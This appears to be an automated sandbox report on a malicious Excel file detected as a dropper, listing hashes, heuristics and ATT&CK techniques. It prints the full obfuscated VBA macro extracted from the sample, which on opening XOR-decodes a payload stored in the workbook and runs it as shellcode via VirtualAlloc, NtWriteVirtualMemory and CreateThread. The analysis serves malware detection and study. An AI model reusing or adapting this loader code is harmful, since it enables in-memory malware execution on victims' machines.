Office (OLE) malware analysis — malicious · dfd2f7f87b6c8156

MALICIOUS

Office (OLE)

38.7 KB Created: 2017-08-03 08:16:44 Authoring application: Microsoft Excel First seen: 2017-08-08

MD5: 557610366b150bece02544339c0ed96f SHA-1: 3677911ef890b63f8c7090b61ac5421187d52d8a SHA-256: dfd2f7f87b6c8156492818336f70e8917853ee2db10d29d980d8252690344a6e

138 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains both Excel 4.0 (XLM) macros and VBA macros, with the VBA macros referencing Windows API functions like VirtualAlloc and CreateThread. This suggests the sample is designed to allocate memory and execute code, likely a second-stage payload. The ClamAV detection as 'Xls.Dropper.Agent-6335064-0' further supports its role as a dropper.

Heuristics 7

ClamAV: Xls.Dropper.Agent-6335064-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.Agent-6335064-0
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Public Sub Document_Open()
    IqQsCEAqnVJvCzh
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
    Document_Open
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	172 bytes
SHA-256: `63d3437f0ef9d6e6f7cafadd6a5473d8826a0decff0e7e519719b73893f4ae2d`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Makro ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4736 bytes
SHA-256: `332c7c5f127fe66c698aaca2ebf7970e4db8479c9065d639909eb60860dfefba`
Detection ClamAV: No threats found Obfuscation or payload: likely 37 of 71 identifiers look randomly generated (e.g. 'hdsFruiWGzuHRbjDNSXZxgVPKNuZkLiIQBPnvlno') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "BuÇalışmaKitabı" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit #If VBA7 Then Private Declare PtrSafe Function KbwwMGLUx Lib "kernel32" Alias "CreateThread" (ByVal yFwSUySmWlHEXAzpgNYgJVjcU As Long, ByVal eARQWpDri As Long, ByVal yFaprdDwbHAmwuTsYahCw As LongPtr, YLusvgpraGsRQB As Long, ByVal IPFsNbmJRexWEqDjFleGpVZ As Long, xhJHTUEDsFqkCkJsMbDoY As Long) As LongPtr Private Declare PtrSafe Function PWUFrFPWzTDZatGuCMUnsLK Lib "kernel32" Alias "VirtualAlloc" (ByVal LoBcRjvTtHbgsHpCUpOmVcLvRiqV As Long, ByVal xfPIKUnkIfJwxWdXCgkf As LongPtr, ByVal rwbtbJCglITznWCmxINbsljeQ As Long, ByVal fIypcfQPfIOoIkLe As Long) As LongPtr Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal wQWjZBLexxdyfmWD As LongPtr, ByVal DUIVFNJyRUxiZCpoON As LongPtr, ByVal UpfhMlFIMra As String, ByVal RLgHRvBQcmKiGnV As LongPtr, ByRef VOkqzIImxNVKafXh As LongPtr) As LongPtr #Else Private Declare Function KbwwMGLUx Lib "kernel32" Alias "CreateThread" (ByVal yFwSUySmWlHEXAzpgNYgJVjcU As Long, ByVal eARQWpDri As Long, ByVal yFaprdDwbHAmwuTsYahCw As Long, YLusvgpraGsRQB As Long, ByVal IPFsNbmJRexWEqDjFleGpVZ As Long, xhJHTUEDsFqkCkJsMbDoY As Long) As Long Private Declare Function PWUFrFPWzTDZatGuCMUnsLK Lib "kernel32" Alias "VirtualAlloc" (ByVal LoBcRjvTtHbgsHpCUpOmVcLvRiqV As Long, ByVal xfPIKUnkIfJwxWdXCgkf As Long, ByVal rwbtbJCglITznWCmxINbsljeQ As Long, ByVal fIypcfQPfIOoIkLe As Long) As Long Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal wQWjZBLexxdyfmWD As Long, ByVal DUIVFNJyRUxiZCpoON As Long, ByVal UpfhMlFIMra As String, ByVal RLgHRvBQcmKiGnV As Long, ByRef VOkqzIImxNVKafXh As Long) As Long #End If Const dLWCyrKSc = &H1000 Const HvZmRoFmIemsxuAH = &H40 Public Sub IqQsCEAqnVJvCzh() Dim VHDDGQOIvEcHoVWuIzFyrUkgHrPU() As Byte VHDDGQOIvEcHoVWuIzFyrUkgHrPU = vDRyoSBQHkkAjoWoXGTsfLvd(ActiveWorkbook.FullName) Dim JgJdiSVLOQRBiXYCScsYpN As String JgJdiSVLOQRBiXYCScsYpN = StrConv(VHDDGQOIvEcHoVWuIzFyrUkgHrPU, 64) Dim TIEawx TIEawx = Split(JgJdiSVLOQRBiXYCScsYpN, "hdsFruiWGzuHRbjDNSXZxgVPKNuZkLiIQBPnvlnovWpmVQWRNctXsXybhDUDajLUqLRpmWiCFIDAQJTTQCmhslqSdNgRqKolkvWkZHFQUQsJuXkyKbMxXEBeuYmyPrlVurqvNIUjWvmBSHyfCHgpXQoFTRPaugbDFxocHPLbgCBCrZmNAhVhkWXEdKBVT") Dim oaUYMytDfdbIUJOXjXmDOpxVvVd As String Dim BmDubhXpZ As String Dim MuzsiYOcKJKiNouLDnIHufF As String BmDubhXpZ = StrConv(StrConv(TIEawx(UBound(TIEawx)), 64), 128) MuzsiYOcKJKiNouLDnIHufF = Mid$(BmDubhXpZ, 3, Len(BmDubhXpZ)) oaUYMytDfdbIUJOXjXmDOpxVvVd = vculRliv("PPtJWvtvyNWfiupLoTFcAnlTtJz", MuzsiYOcKJKiNouLDnIHufF) #If VBA7 Then Dim pZIQFpHF As LongPtr Dim MLXTRqqLZIyRutlLQG As LongPtr #Else Dim pZIQFpHF As Long Dim MLXTRqqLZIyRutlLQG As Long #End If pZIQFpHF = PWUFrFPWzTDZatGuCMUnsLK(0, Len(oaUYMytDfdbIUJOXjXmDOpxVvVd), dLWCyrKSc, HvZmRoFmIemsxuAH) MLXTRqqLZIyRutlLQG = NtWriteVirtualMemory(-1, pZIQFpHF, oaUYMytDfdbIUJOXjXmDOpxVvVd, Len(oaUYMytDfdbIUJOXjXmDOpxVvVd), 0) MLXTRqqLZIyRutlLQG = KbwwMGLUx(0, 0, pZIQFpHF, 0, 0, 0) End Sub Public Function vDRyoSBQHkkAjoWoXGTsfLvd(ByVal TgYDYCQuD As String) As Byte() Dim BmDubhXpZ As Long Dim MuzsiYOcKJKiNouLDnIHufF() As Byte BmDubhXpZ = FreeFile If LenB(Dir(TgYDYCQuD)) Then Open TgYDYCQuD For Binary Access Read As BmDubhXpZ ReDim MuzsiYOcKJKiNouLDnIHufF(LOF(BmDubhXpZ) - 1&) As Byte Get BmDubhXpZ, , MuzsiYOcKJKiNouLDnIHufF Close BmDubhXpZ Else Err.Raise 53 End If vDRyoSBQHkkAjoWoXGTsfLvd = MuzsiYOcKJKiNouLDnIHufF Erase MuzsiYOcKJKiNouLDnIHufF End Function Public Sub Document_Open() IqQsCEAqnVJvCzh End Sub Sub Workbook_Open() Document_Open End Sub Public Function vculRliv(rxyGGuaONJUytyo As String, qEJGr As String) As String Dim GPtXgEDlzBoMv As Long Dim VeWTITGwLHbDflAGyPeaRJnIo As String Dim lCjskHdyelHQYyL As Integer, wIkxhYSyhCu As Integer, a As Long For GPtXgEDlzBoMv = 1 To Len(qEJGr) a = GPtXgEDlzBoMv Mod Len(rxyGGuaONJUytyo) If a = 0 Then a = Len(rxyGGuaONJUytyo) lCjskHdyelHQYyL = Asc(Mid$(qEJGr, GPtXgEDlzBoMv, 1)) wIkxhYSyhCu = Asc(Mid$(rxyGGuaONJUytyo, a, 1)) VeWTITGwLHbDflAGyPeaRJnIo = VeWTITGwLHbDflAGyPeaRJnIo + Chr(lCjskHdyelHQYyL Xor wIkxhYSyhCu) Next GPtXgEDlzBoMv vculRliv = VeWTITGwLHbDflAGyPeaRJnIo End Function

Open this report in the interactive analyzer, or submit your own file for analysis.